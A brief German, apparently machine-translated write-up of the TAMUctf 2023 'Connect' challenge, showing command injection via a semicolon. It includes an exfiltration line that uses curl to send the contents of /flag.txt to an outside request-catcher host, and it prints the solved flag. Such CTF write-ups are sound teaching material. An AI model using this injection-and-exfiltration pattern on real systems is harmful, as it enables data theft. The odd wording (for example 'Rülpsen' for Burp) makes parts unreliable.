TAMUctf 2023 – Connect-Beitrag
May 01 2023
Diese Herausforderung wurde von Mr. Blade erstellt. Laden Sie die Verbindung herunter.
Diese Herausforderung wurde von Mr. Blade erstellt
Laden Sie die Datei connect.zip herunter. Wir haben app.py
Ich hatte das so geändert, dass ich es ausführen und lokal testen konnte.
Wir können weitere Befehle hinzufügen, indem wir ; .
Ich hatte einen Anfragefänger mit erstellthttps://requestcatcher.com/um die Anfrage zu erfassen.
Führen wir eine Befehlsinjektion durch, indem wir ; hinzufügen. curl -s https://flag.requestcatcher.com/$(cat /flag.txt)
Der Flaggenpfad wird in der Challenge-Beschreibung erwähnt.
Ich habe Rülpsen verwendet und die Nutzlast per URL codiert. Sehen wir uns den Anfragefänger an.
Die Flagge ist gigem{p00r_f1lt3rs_m4k3_f0r_p00r_s3cur1ty}.
Danke fürs Lesen.
Viel Spaß beim Hacken!

![Was ist überhaupt eine verknüpfte Liste? [Teil 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)



































